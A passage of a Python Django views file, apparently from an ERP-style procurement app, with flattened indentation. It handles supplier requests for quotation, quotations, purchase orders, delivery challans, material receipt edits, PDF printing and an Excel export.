get_last_rfq_no = get_last_rfq_no.rfq_no
get_last_rfq_no = get_last_rfq_no[-3:]
num = int(get_last_rfq_no)
num = num + 1
get_last_rfq_no = 'RFQ/SP/' + str(num)
else:
get_last_rfq_no = 'RFQ/SP/101'
customer = Q(account_id = '100')
supplier = Q(account_id = '200')
all_accounts = ChartOfAccount.objects.filter(customer|supplier).all()
item_code = request.POST.get('item_code',False)
if item_code:
data = Add_products.objects.filter(product_code = item_code)
for value in data:
print(value.product_code)
row = serializers.serialize('json',data)
return HttpResponse(json.dumps({'row':row}))
if request.method == 'POST':
supplier = request.POST.get('supplier',False)
attn = request.POST.get('attn',False)
follow_up = request.POST.get('follow_up',False)
footer_remarks = request.POST.get('footer_remarks',False)
items = json.loads(request.POST.get('items'))
try:
account_id = ChartOfAccount.objects.get(account_title = supplier)
except ChartOfAccount.DoesNotExist:
return JsonResponse({"result":"No Account Found "+supplier+""})
if follow_up:
follow_up = follow_up
else:
follow_up = '2010-10-06'
date = datetime.date.today()
rfq_header = RfqSupplierHeader(rfq_no = get_last_rfq_no, date = date , attn = attn, follow_up = follow_up, footer_remarks = footer_remarks ,account_id = account_id, company_id = company, user_id = request.user)
rfq_header.save()
header_id = RfqSupplierHeader.objects.get(rfq_no=get_last_rfq_no)
for value in items:
id = value["id"]
id = Add_products.objects.get(id = id)
rfq_detail = RfqSupplierDetail(item_id = id, quantity = value["quantity"], unit = value["unit"], rfq_id = header_id)
rfq_detail.save()
return JsonResponse({"result": "success"})
return render(request,'supplier/new_rfq_supplier.html',{'get_last_rfq_no':get_last_rfq_no, 'all_item_code':all_item_code, 'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_rfq_edit)
def edit_rfq_supplier(request,pk):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
rfq_header = RfqSupplierHeader.objects.filter(company,id = pk).first()
rfq_detail = RfqSupplierDetail.objects.filter(rfq_id = rfq_header.id).all()
all_item_code = list(Add_products.objects.values('product_code'))
customer = Q(account_id = '100')
supplier = Q(account_id = '200')
all_accounts = ChartOfAccount.objects.filter(customer|supplier).all()
try:
item_code = request.POST.get('item_code',False)
if item_code:
item_id = Add_products.objects.get(product_code = item_code)
item_code_exist = RfqSupplierDetail.objects.filter(item_id = item_id, rfq_id = rfq_header.id).first()
data = Add_products.objects.filter(id = item_id.id)
if item_code_exist:
return HttpResponse(json.dumps({'message':"Item Already Exist"}))
row = serializers.serialize('json',data)
return HttpResponse(json.dumps({'row':row}))
if request.method == 'POST':
rfq_detail.delete()
edit_rfq_supplier_name = request.POST.get('edit_rfq_supplier_name',False)
edit_rfq_attn = request.POST.get('edit_rfq_attn',False)
edit_rfq_follow_up = request.POST.get('edit_rfq_follow_up',False)
edit_footer_remarks = request.POST.get('edit_footer_remarks',False)
try:
account_id = ChartOfAccount.objects.get(account_title = edit_rfq_supplier_name)
except ChartOfAccount.DoesNotExist:
return JsonResponse({"result":"No Account Found "+edit_rfq_supplier_name+""})
if edit_rfq_follow_up:
edit_rfq_follow_up = edit_rfq_follow_up
else:
edit_rfq_follow_up = '2010-10-06'
rfq_header.attn = edit_rfq_attn
rfq_header.follow_up = edit_rfq_follow_up
rfq_header.account_id = account_id
rfq_header.footer_remarks = edit_footer_remarks
rfq_header.save()
header_id = RfqSupplierHeader.objects.get(id = pk)
items = json.loads(request.POST.get('items'))
for value in items:
id = value["id"]
id = Add_products.objects.get(id = id)
rfq_detail = RfqSupplierDetail(item_id = id, quantity = value["quantity"], unit = value["unit"], rfq_id = header_id)
rfq_detail.save()
return JsonResponse({"result":"success"})
except IntegrityError:
print("Data Already Exist")
return render(request,'supplier/edit_rfq_supplier.html',{'rfq_header':rfq_header,'pk':pk,'rfq_detail':rfq_detail, 'all_item_code':all_item_code, 'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@user_passes_test(allow_rfq_delete)
def delete_rfq_supplier(request,pk):
RfqSupplierDetail.objects.filter(rfq_id_id = pk).all().delete()
RfqSupplierHeader.objects.filter(id = pk).delete()
messages.add_message(request, messages.SUCCESS, "Supplier RFQ Deleted")
return redirect('rfq-supplier')
@login_required
@user_passes_test(allow_quotation_display)
def quotation_supplier(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
permission = quotation_roles2(request.user)
all_quotation = QuotationHeaderSupplier.objects.all()
return render(request, 'supplier/quotation_supplier.html',{'all_quotation':all_quotation,'permission':permission,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles,'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_quotation_add)
def new_quotation_supplier(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
get_last_quotation_no = QuotationHeaderSupplier.objects.last()
all_item_code = Add_products.objects.all()
customer = Q(account_id = '100')
supplier = Q(account_id = '200')
all_accounts = ChartOfAccount.objects.filter(customer|supplier).all()
if get_last_quotation_no:
get_last_quotation_no = get_last_quotation_no.quotation_no
get_last_quotation_no = get_last_quotation_no[-3:]
num = int(get_last_quotation_no)
num = num + 1
get_last_quotation_no = 'QU/SP/' + str(num)
else:
get_last_quotation_no = 'QU/SP/101'
item_code_quotation = request.POST.get('item_code_quotation',False)
if item_code_quotation:
data = Add_products.objects.filter(product_code = item_code_quotation)
row = serializers.serialize('json',data)
print(row)
return HttpResponse(json.dumps({'row':row}))
if request.method == 'POST':
supplier = request.POST.get('supplier',False)
attn = request.POST.get('attn',False)
prcbasis = request.POST.get('prcbasis',False)
leadtime = request.POST.get('leadtime',False)
validity = request.POST.get('validity',False)
payment = request.POST.get('payment',False)
remarks = request.POST.get('remarks',False)
currency = request.POST.get('currency',False)
exchange_rate = request.POST.get('exchange_rate',False)
follow_up = request.POST.get('follow_up',False)
footer_remarks = request.POST.get('footer_remarks',False)
if follow_up:
follow_up = follow_up
else:
follow_up = '2010-10-06'
try:
account_id = ChartOfAccount.objects.get(account_title = supplier)
except ChartOfAccount.DoesNotExist:
return JsonResponse({"result":"No Account Found "+supplier+""})
date = datetime.date.today()
quotation_header = QuotationHeaderSupplier(quotation_no = get_last_quotation_no, date = date, attn = attn, prc_basis = prcbasis,
leadtime = leadtime, validity = validity, payment = payment, remarks = remarks, currency = currency,
exchange_rate = exchange_rate, follow_up = follow_up, show_notification = True, footer_remarks = footer_remarks, account_id = account_id, company_id = company, user_id = request.user)
quotation_header.save()
items = json.loads(request.POST.get('items'))
header_id = QuotationHeaderSupplier.objects.get(quotation_no = get_last_quotation_no)
for value in items:
id = value["id"]
id = Add_products.objects.get(id = id)
quotation_detail = QuotationDetailSupplier(item_id = id, quantity = value["quantity"], unit = value["unit"], unit_price = value["unit_price"], remarks = value["remarks"], quotation_id = header_id)
quotation_detail.save()
return JsonResponse({'result':'success'})
return render(request, 'supplier/new_quotation_supplier.html',{'all_item_code':all_item_code,'get_last_quotation_no':get_last_quotation_no,'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_quotation_edit)
def edit_quotation_supplier(request,pk):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
quotation_header = QuotationHeaderSupplier.objects.filter(company, id = pk).first()
quotation_detail = QuotationDetailSupplier.objects.filter(quotation_id = quotation_header.id).all()
all_accounts = ChartOfAccount.objects.all()
print(quotation_detail)
all_item_code = list(Add_products.objects.values('product_code'))
item_code = request.POST.get('item_code',False)
if item_code:
item_id = Add_products.objects.get(product_code = item_code)
item_code_exist = QuotationDetailSupplier.objects.filter(item_id = item_id, quotation_id = quotation_header.id).first()
data = Add_products.objects.filter(id = item_id.id)
if item_code_exist:
return HttpResponse(json.dumps({'message':"Item Already Exist"}))
row = serializers.serialize('json',data)
return HttpResponse(json.dumps({'row':row}))
if request.method == 'POST':
quotation_detail.delete()
edit_supplier = request.POST.get('supplier',False)
edit_quotation_attn = request.POST.get('attn',False)
edit_quotation_prcbasis = request.POST.get('prcbasis',False)
edit_quotation_leadtime = request.POST.get('leadtime',False)
edit_quotation_validity = request.POST.get('validity',False)
edit_quotation_payment = request.POST.get('payment',False)
edit_quotation_remarks = request.POST.get('remarks',False)
edit_quotation_currency_rate = request.POST.get('currency',False)
edit_quotation_exchange_rate = request.POST.get('exchange_rate',False)
edit_quotation_follow_up = request.POST.get('follow_up',False)
edit_footer_remarks = request.POST.get('edit_footer_remarks',False)
try:
account_id = ChartOfAccount.objects.get(account_title = edit_supplier)
except ChartOfAccount.DoesNotExist:
return JsonResponse({"result":"No Account Found "+edit_supplier+""})
quotation_header.attn = edit_quotation_attn
quotation_header.prc_basis = edit_quotation_prcbasis
quotation_header.leadtime = edit_quotation_leadtime
quotation_header.validity = edit_quotation_validity
quotation_header.payment = edit_quotation_payment
quotation_header.remarks = edit_quotation_remarks
quotation_header.currency = edit_quotation_currency_rate
quotation_header.exchange_rate = edit_quotation_exchange_rate
quotation_header.account_id = account_id
quotation_header.follow_up = edit_quotation_follow_up
quotation_header.footer_remarks = edit_footer_remarks
quotation_header.save()
header_id = QuotationHeaderSupplier.objects.get(id = pk)
items = json.loads(request.POST.get('items'))
print(items)
for value in items:
id = value["id"]
id = Add_products.objects.get(id = id)
quotation_detail = QuotationDetailSupplier(item_id = id, quantity = value["quantity"], unit = value["unit"], unit_price = value["unit_price"], remarks = value["remarks"], quotation_id = header_id)
quotation_detail.save()
return JsonResponse({"result":"success"})
return render(request,'supplier/edit_quotation_supplier.html',{'quotation_header':quotation_header,'pk':pk,'quotation_detail':quotation_detail, 'all_item_code':all_item_code, 'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_quotation_print)
def print_quotation_supplier(request,pk):
company = request.session['company']
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
lines = 0
total_amount = 0
company_info = Company_info.objects.filter(id = company).all()
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
header = QuotationHeaderSupplier.objects.filter(company,id = pk).first()
detail = QuotationDetailSupplier.objects.filter(quotation_id = header.id).all()
for value in detail:
amount = float(value.unit_price * value.quantity)
total_amount = total_amount + amount
total_amount = total_amount * float(header.exchange_rate)
pdf = render_to_pdf('supplier/quotation_supplier_pdf.html', {'company_info':company_info,'header':header, 'detail':detail,'total_amount':total_amount,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
if pdf:
response = HttpResponse(pdf, content_type='application/pdf')
filename = "Quotation_Supplier_%s.pdf" %("123")
content = "inline; filename='%s'" %(filename)
response['Content-Disposition'] = content
return response
return HttpResponse("Not found")
@login_required
@user_passes_test(allow_quotation_delete)
def delete_quotation_supplier(request,pk):
QuotationDetailSupplier.objects.filter(quotation_id_id = pk).all().delete()
QuotationHeaderSupplier.objects.filter(id = pk).delete()
messages.add_message(request, messages.SUCCESS, "Supplier Quotation Deleted")
return redirect('quotation-supplier')
@login_required
def quotation_export_supplier(request):
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
response = HttpResponse(content_type='application/ms-excel')
response['Content-Disposition'] = 'attachment; filename="QuotationSupplier.xls"'
wb = xlwt.Workbook(encoding='utf-8')
ws = wb.add_sheet('Users')
# Sheet header, first row
row_num = 0
font_style = xlwt.XFStyle()
font_style.font.bold = True
columns = ['Quotation No', 'Date','Attn' ,'Prc Basis', 'Lead Time', 'Validity', 'Payment', 'Remarks', 'Curreny', 'Exchange Rate', 'Follow Up', 'Footer Remarks']
for col_num in range(len(columns)):
ws.write(row_num, col_num, columns[col_num], font_style)
# Sheet body, remaining rows
font_style = xlwt.XFStyle()
rows = QuotationHeaderSupplier.objects.all().values_list('quotation_no', 'date', 'attn', 'prc_basis', 'leadtime', 'validity', 'payment', 'remarks', 'currency', 'exchange_rate', 'follow_up', 'footer_remarks')
for row in rows:
row_num += 1
for col_num in range(len(row)):
ws.write(row_num, col_num, row[col_num], font_style)
wb.save(response)
return response
@login_required
@user_passes_test(allow_purchase_order_display)
def purchase_order_supplier(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
permission = purchase_order_roles(request.user)
all_po = PoHeaderSupplier.objects.all()
return render(request, 'supplier/purchase_order_supplier.html',{'all_po':all_po,'permission':permission,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles,'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_purchase_order_add)
def new_purchase_order_supplier(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
get_last_po_no = PoHeaderSupplier.objects.last()
all_item_code = Add_products.objects.all
all_accounts = ChartOfAccount.objects.all()
if get_last_po_no:
get_last_po_no = get_last_po_no.po_no
get_last_po_no = get_last_po_no[-3:]
num = int(get_last_po_no)
num = num + 1
get_last_po_no = 'PO/SP/' + str(num)
else:
get_last_po_no = 'PO/SP/101'
item_code_po = request.POST.get('item_code_po',False)
if item_code_po:
data = Add_products.objects.filter(product_code = item_code_po)
for value in data:
print(value.product_code)
row = serializers.serialize('json',data)
return HttpResponse(json.dumps({'row':row}))
if request.method == 'POST':
supplier = request.POST.get('supplier',False)
attn = request.POST.get('attn',False)
prcbasis = request.POST.get('prcbasis',False)
leadtime = request.POST.get('leadtime',False)
validity = request.POST.get('validity',False)
payment = request.POST.get('payment',False)
remarks = request.POST.get('remarks',False)
currency = request.POST.get('currency',False)
exchange_rate = request.POST.get('exchange_rate',False)
follow_up = request.POST.get('follow_up',False)
footer_remarks = request.POST.get('footer_remarks',False)
try:
account_id = ChartOfAccount.objects.get(account_title = supplier)
except ChartOfAccount.DoesNotExist:
return JsonResponse({"result":"No Account Found "+supplier+""})
date = datetime.date.today()
po_header = PoHeaderSupplier(po_no = get_last_po_no, date = date, attn = attn, prc_basis = prcbasis,
leadtime = leadtime, validity = validity, payment = payment, remarks = remarks, currency = currency,
exchange_rate = exchange_rate, follow_up = follow_up, show_notification = True, footer_remarks = footer_remarks ,account_id = account_id, company_id = company, user_id = request.user)
po_header.save()
items = json.loads(request.POST.get('items'))
header_id = PoHeaderSupplier.objects.get(po_no = get_last_po_no)
for value in items:
id = value["id"]
id = Add_products.objects.get(id = id)
po_detail = PoDetailSupplier(item_id = id, quantity = value["quantity"], unit = value["unit"], unit_price = value["unit_price"], remarks = value["remarks"], quotation_no = "to be define" ,po_id = header_id)
po_detail.save()
return JsonResponse({'result':'success'})
return render(request, 'supplier/new_purchase_order_supplier.html',{'all_item_code':all_item_code,'get_last_po_no':get_last_po_no, 'all_accounts': all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_purchase_order_edit)
def edit_purchase_order_supplier(request,pk):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
po_header = PoHeaderSupplier.objects.filter(company, id = pk).first()
po_detail = PoDetailSupplier.objects.filter(po_id = po_header.id).all()
all_item_code = list(Add_products.objects.values('product_code'))
all_accounts = ChartOfAccount.objects.all()
item_code = request.POST.get('item_code')
if item_code:
item_id = Add_products.objects.get(product_code = item_code)
item_code_exist = PoDetailSupplier.objects.filter(item_id = item_id, po_id = po_header.id).first()
data = Add_products.objects.filter(id = item_id.id)
if item_code_exist:
return HttpResponse(json.dumps({'message':"Item Already Exist"}))
row = serializers.serialize('json',data)
return HttpResponse(json.dumps({'row':row}))
if request.method == 'POST':
po_detail.delete()
edit_po_supplier = request.POST.get('supplier',False)
edit_po_attn = request.POST.get('attn',False)
edit_po_prcbasis = request.POST.get('prcbasis',False)
edit_po_leadtime = request.POST.get('leadtime',False)
edit_po_validity = request.POST.get('validity',False)
edit_po_payment = request.POST.get('payment',False)
edit_po_remarks = request.POST.get('remarks',False)
edit_po_currency_rate = request.POST.get('currency',False)
edit_po_exchange_rate = request.POST.get('exchange_rate',False)
edit_po_follow_up = request.POST.get('follow_up',False)
edit_footer_remarks = request.POST.get('edit_footer_remarks',False)
try:
account_id = ChartOfAccount.objects.get(account_title = edit_po_supplier)
except ChartOfAccount.DoesNotExist:
return JsonResponse({"result":"No Account Found "+edit_po_supplier+""})
po_header.attn = edit_po_attn
po_header.prc_basis = edit_po_prcbasis
po_header.leadtime = edit_po_leadtime
po_header.validity = edit_po_validity
po_header.payment = edit_po_payment
po_header.remarks = edit_po_remarks
po_header.currency = edit_po_currency_rate
po_header.exchange_rate = edit_po_exchange_rate
po_header.footer_remarks = edit_footer_remarks
po_header.follow_up = edit_po_follow_up
po_header.account_id = account_id
po_header.save()
header_id = PoHeaderSupplier.objects.get(id = pk)
items = json.loads(request.POST.get('items'))
for value in items:
id = value["id"]
id = Add_products.objects.get(id = id)
po_detail = PoDetailSupplier(item_id = id, quantity = value["quantity"], unit = value["unit"], unit_price = value["unit_price"], remarks = value["remarks"], quotation_no = "to be define" ,po_id = header_id)
po_detail.save()
return JsonResponse({"result":"success"})
return render(request,'supplier/edit_purchase_order_supplier.html',{'po_header':po_header,'pk':pk,'po_detail':po_detail, 'all_item_code':all_item_code, 'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_purchase_order_print)
def print_po_supplier(request,pk):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
lines = 0
total_amount = 0
company_info = Company_info.objects.all()
image = Company_info.objects.filter(id = 1).first()
print(image.company_logo)
header = PoHeaderSupplier.objects.filter(company, id = pk).first()
detail = PoDetailSupplier.objects.filter(po_id = header.id).all()
for value in detail:
lines = lines + len(value.item_description.split('\n'))
amount = float(value.unit_price * value.quantity)
total_amount = total_amount + amount
print(total_amount)
lines = lines + len(detail) + len(detail)
total_lines = 40 - lines
pdf = render_to_pdf('supplier/po_supplier_pdf.html', {'company_info':company_info,'image':image,'header':header, 'detail':detail,'total_lines':total_lines,'total_amount':total_amount,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
if pdf:
response = HttpResponse(pdf, content_type='application/pdf')
filename = "Po_Supplier_%s.pdf" %(header.po_no)
content = "inline; filename='%s'" %(filename)
response['Content-Disposition'] = content
return response
return HttpResponse("Not found")
@login_required
@user_passes_test(allow_purchase_order_delete)
def delete_purchase_order_supplier(request,pk):
PoDetailSupplier.objects.filter(po_id_id = pk).all().delete()
PoHeaderSupplier.objects.filter(id = pk).delete()
messages.add_message(request, messages.SUCCESS, "Supplier Purchase Order Deleted")
return redirect('purchase-order-supplier')
@login_required
@user_passes_test(allow_delivery_challan_display)
def delivery_challan_supplier(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
permission = delivery_challan_roles(request.user)
all_dc = DcHeaderSupplier.objects.all()
return render(request, 'supplier/delivery_challan_supplier.html',{'all_dc':all_dc,'permission':permission,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_delivery_challan_add)
def new_delivery_challan_supplier(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
all_item_code = Add_products.objects.all()
get_last_dc_no = DcHeaderSupplier.objects.last()
all_accounts = ChartOfAccount.objects.all()
if get_last_dc_no:
get_last_dc_no = get_last_dc_no.dc_no
get_last_dc_no = get_last_dc_no[-3:]
num = int(get_last_dc_no)
num = num + 1
get_last_dc_no = 'DC/SP/' + str(num)
else:
get_last_dc_no = 'DC/SP/101'
item_code_dc = request.POST.get('item_code_dc',False)
if item_code_dc:
item_code_dc = item_code_dc[:12]
data = Add_products.objects.filter(product_code = item_code_dc)
for value in data:
print(value.product_code)
row = serializers.serialize('json',data)
return HttpResponse(json.dumps({'row':row}))
if request.method == 'POST':
dc_supplier = request.POST.get('supplier')
footer_remarks = request.POST.get('footer_remarks')
follow_up = request.POST.get('follow_up')
try:
account_id = ChartOfAccount.objects.get(account_title = dc_supplier)
except ChartOfAccount.DoesNotExist:
return JsonResponse({"result":"No Account Found "+dc_supplier+""})
date = datetime.date.today()
dc_header = DcHeaderSupplier(dc_no = get_last_dc_no, date = date, footer_remarks = footer_remarks, follow_up = follow_up ,account_id = account_id, company_id = company, user_id = request.user)
dc_header.save()
items = json.loads(request.POST.get('items'))
header_id = DcHeaderSupplier.objects.get(dc_no = get_last_dc_no)
for value in items:
item_id = Add_products.objects.get(id = value["id"])
dc_detail = DcDetailSupplier(item_id = item_id, quantity = value["quantity"],accepted_quantity = 0, returned_quantity = 0, po_no = "" ,dc_id = header_id)
dc_detail.save()
return JsonResponse({'result':'success'})
return render(request, 'supplier/new_delivery_challan_supplier.html',{'all_item_code':all_item_code,'get_last_dc_no':get_last_dc_no,'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_delivery_challan_edit)
def edit_delivery_challan_supplier(request,pk):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
dc_header = DcHeaderSupplier.objects.filter(company, id = pk).first()
dc_detail = DcDetailSupplier.objects.filter(dc_id = dc_header.id).all()
all_accounts = ChartOfAccount.objects.all()
all_item_code = list(Add_products.objects.values('product_code'))
item_code = request.POST.get('item_code')
if item_code:
item_id = Add_products.objects.get(product_code = item_code)
item_code_exist = DcDetailSupplier.objects.filter(item_id = item_id, dc_id = dc_detail.id).first()
data = Add_products.objects.filter(id = item_id.id)
if item_code_exist:
return HttpResponse(json.dumps({'message':"Item Already Exist"}))
row = serializers.serialize('json',data)
return HttpResponse(json.dumps({'row':row}))
if request.method == 'POST':
dc_detail.delete()
dc_supplier = request.POST.get('supplier')
follow_up = request.POST.get('follow_up')
edit_footer_remarks = request.POST.get('edit_footer_remarks')
try:
account_id = ChartOfAccount.objects.get(account_title = dc_supplier)
except ChartOfAccount.DoesNotExist:
return JsonResponse({"result":"No Account Found "+dc_supplier+""})
dc_header.account_id = account_id
dc_header.follow_up = follow_up
dc_header.footer_remarks = edit_footer_remarks
dc_header.save()
header_id = DcHeaderSupplier.objects.get(id = pk)
items = json.loads(request.POST.get('items'))
for value in items:
print(value["id"])
item_id = Add_products.objects.get(id = value["id"])
dc_detail = DcDetailSupplier(item_id = item_id, quantity = value["quantity"],accepted_quantity = 0, returned_quantity = 0, po_no = "" ,dc_id = header_id, remarks = value["remarks"], unit = value["unit"])
dc_detail.save()
return JsonResponse({"result":"success"})
return render(request,'supplier/edit_delivery_challan_supplier.html',{'dc_header':dc_header,'pk':pk,'dc_detail':dc_detail, 'all_item_code':all_item_code, 'all_accounts':all_accounts,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_delivery_challan_print)
def print_dc_supplier(request,pk):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
lines = 0
company_info = Company_info.objects.all()
image = Company_info.objects.filter(company_name = "Hamza Enterprise").first()
header = DcHeaderSupplier.objects.filter(company, id = pk).first()
detail = DcDetailSupplier.objects.filter(dc_id = header.id).all()
for value in detail:
lines = lines + len(value.item_description.split('\n'))
lines = lines + len(detail) + len(detail)
total_lines = 40 - lines
pdf = render_to_pdf('supplier/dc_supplier_pdf.html', {'company_info':company_info,'image':image,'header':header, 'detail':detail,'total_lines':total_lines,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
if pdf:
response = HttpResponse(pdf, content_type='application/pdf')
filename = "Po_Supplier_%s.pdf" %(header.dc_no)
content = "inline; filename='%s'" %(filename)
response['Content-Disposition'] = content
return response
return HttpResponse("Not found")
@login_required
@user_passes_test(allow_delivery_challan_delete)
def delete_delivery_challan_supplier(request,pk):
DcDetailSupplier.objects.filter(dc_id_id = pk).all().delete()
DcHeaderSupplier.objects.filter(id = pk).delete()
messages.add_message(request, messages.SUCCESS, "Supplier Delivery Challan Deleted")
return redirect('delivery-challan-supplier')
@login_required
@user_passes_test(allow_mrn_display)
def mrn_supplier(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
permission = mrn_roles(request.user)
all_dc = DcHeaderSupplier.objects.all()
return render(request, 'supplier/mrn_supplier.html',{'all_dc':all_dc,'permission':permission,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
@user_passes_test(allow_mrn_edit)
def edit_mrn_supplier(request,pk):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
dc_header = DcHeaderSupplier.objects.filter(company, id=pk).first()
dc_detail = DcDetailSupplier.objects.filter(dc_id=dc_header.id).all()
if request.method == 'POST':
follow_up = request.POST.get('follow_up', False)
dc_header.follow_up = follow_up
dc_header.save()
items = json.loads(request.POST.get('items'))
for i,value in enumerate(dc_detail):
value.accepted_quantity = items[i]["accepted_quantity"]
value.save()
return JsonResponse({"result":"success"})
